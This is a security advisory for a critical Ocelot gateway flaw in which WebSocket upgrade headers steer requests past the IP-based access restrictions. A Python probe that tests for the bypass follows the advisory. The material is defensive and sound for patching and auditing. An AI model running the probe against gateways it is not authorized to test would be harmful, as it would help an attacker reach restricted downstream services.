PT-2026-53923 · Ocelot · Ocelot

George Chen

·

Published

2026-06-30

·

Updated

2026-06-30

·

CVE-2026-58172

CVSS v3.1

9.1

Critical

Vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Name of the Vulnerable Software and Affected Versions: Ocelot versions prior to 24.1.1
Description: A security control bypass exists in the handling of WebSocket upgrade requests. The pipeline branch that MapWhen selects for WebSocket requests in OcelotPipelineExtensions.cs omits the SecurityMiddleware, so requests carrying WebSocket upgrade headers are never checked against the configured IP-based access restrictions. An attacker on a blocked IP address can therefore add the upgrade headers to a request to steer it through the branch that skips the IP check, and the gateway proxies it to downstream services the attacker is not allowed to reach. No credentials or user interaction are required.
Recommendations: Update Ocelot to a version containing commit f156fd4 (24.1.1 or later).
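To check a deployment for this class of issue, the probe below sends the same path to the gateway twice, once as a plain GET and once with the WebSocket upgrade headers that make ASP.NET Core treat the request as a WebSocket request, and compares the two responses. This is an added example, not code from the advisory or from the Ocelot project. The host, port and path are whatever gateway you are testing, and the assumption that a request rejected by the IP restriction comes back as 401 or 403 is a placeholder to adjust to what your gateway actually returns.

```python
"""Probe whether a gateway applies its IP restriction to WebSocket upgrade
requests as well as to plain HTTP requests.

Run from an address the gateway is configured to block. If the plain
request is rejected but the upgrade request is switched to WebSocket
(101), the upgrade path is skipping the IP restriction check.
"""
import base64
import os
import socket

# Assumption: the gateway answers a request rejected by its IP restriction
# with one of these statuses. Adjust to the status your deployment returns.
REJECTED = {401, 403}


def websocket_key() -> str:
    """RFC 6455 Sec-WebSocket-Key: 16 random bytes, base64-encoded."""
    return base64.b64encode(os.urandom(16)).decode("ascii")


def build_request(host: str, path: str, websocket: bool) -> bytes:
    """Build a minimal HTTP/1.1 GET. With websocket=True, add the headers
    that make the server classify the request as a WebSocket upgrade."""
    lines = [f"GET {path} HTTP/1.1", f"Host: {host}"]
    if websocket:
        lines += [
            "Upgrade: websocket",
            "Connection: Upgrade",
            f"Sec-WebSocket-Key: {websocket_key()}",
            "Sec-WebSocket-Version: 13",
        ]
    else:
        lines.append("Connection: close")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def parse_status(raw: bytes) -> int:
    """Return the status code from a raw HTTP response, or 0 if unparsable."""
    first_line = raw.split(b"\r\n", 1)[0]
    parts = first_line.split(b" ")
    if len(parts) < 2 or not parts[0].startswith(b"HTTP/"):
        return 0
    try:
        return int(parts[1])
    except ValueError:
        return 0


def send(host: str, port: int, request: bytes, timeout: float = 5.0) -> int:
    """Send one raw request and return the status of the response headers.
    Plain HTTP only; wrap the socket with ssl for a TLS listener."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        data = b""
        while b"\r\n\r\n" not in data:
            chunk = sock.recv(4096)
            if not chunk:
                break
            data += chunk
    return parse_status(data)


def assess(plain_status: int, upgrade_status: int) -> str:
    """Compare the two paths. Only meaningful when the plain request was
    rejected, i.e. the probe ran from a blocked address."""
    if plain_status not in REJECTED:
        return "INCONCLUSIVE: plain request was not rejected; probe from a blocked address"
    if upgrade_status in REJECTED:
        return "OK: IP restriction enforced on the WebSocket upgrade path"
    if upgrade_status == 101:
        return "BYPASS: WebSocket upgrade proxied although plain requests are rejected"
    # e.g. 500/502: the upgrade got past the IP check and failed later,
    # typically because the downstream has no WebSocket endpoint at that path.
    return f"REVIEW: upgrade path answered {upgrade_status}, not the rejection status"


def probe(host: str, port: int, path: str = "/") -> dict:
    plain = send(host, port, build_request(host, path, websocket=False))
    upgrade = send(host, port, build_request(host, path, websocket=True))
    return {"plain": plain, "upgrade": upgrade, "verdict": assess(plain, upgrade)}


if __name__ == "__main__":
    import sys

    target_host, target_port = sys.argv[1], int(sys.argv[2])
    target_path = sys.argv[3] if len(sys.argv) > 3 else "/"
    print(probe(target_host, target_port, target_path))
```

Point it at a route the gateway proxies for WebSocket traffic; a 101 on the upgrade path means the gateway completed the handshake with the downstream service, which is the behaviour the advisory describes. A 5xx on the upgrade path while the plain request is rejected is not proof of a bypass, but it does show the request was handled by a different branch and deserves a look at the pipeline configuration.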

Exploit

Fix

Weakness Enumeration

CWE-288: Authentication Bypass Using an Alternate Path or Channel

Related Identifiers

CVE-2026-58172

Affected Products

Ocelot